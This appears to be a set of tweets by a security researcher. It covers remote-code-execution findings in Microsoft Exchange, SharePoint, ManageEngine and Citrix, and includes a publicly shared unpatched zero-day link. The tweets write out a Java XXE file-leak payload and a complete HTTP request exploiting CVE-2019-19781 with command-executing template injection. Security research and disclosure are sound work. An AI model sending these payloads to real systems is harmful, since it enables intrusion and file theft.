Interviewing with @TalosSecurity
Them: So if you get the job you can't audit any of our products
Me: Ok
... *8 interviews later* ...
Them: Sorry, but you didn't get the job
Me:
A story on how I gained RCE against Microsoft Exchange Online using CVE-2020-16875 and bypassed their patches twice over. Latest patch bypass is unpatched against on-premise deployments!
Making Clouds Rain - Remote Code Execution in Microsoft Office 365: srcincite.io/blog/2021/01/1…
Since @Zoho typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!
Advisory: srcincite.io/advisories/src…
Exploit: srcincite.io/pocs/src-2020-…
SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet: srcincite.io/blog/2020/07/2…
CVE-2020-1147 full analysis and exploit :->
If your exploiting your XXE under Java, I recommend a payload like this:
<!DOCTYPE root [
<!ENTITY stuff SYSTEM ".">
]><root>&stuff;</root>
So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware.
POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: <target>
NSC_USER: ../../../netscaler/portal/templates/si
NSC_NONCE: 5
Content-Length: 53
url=a&title=[%+template.new({'BLOCK'='print+`id`'})%]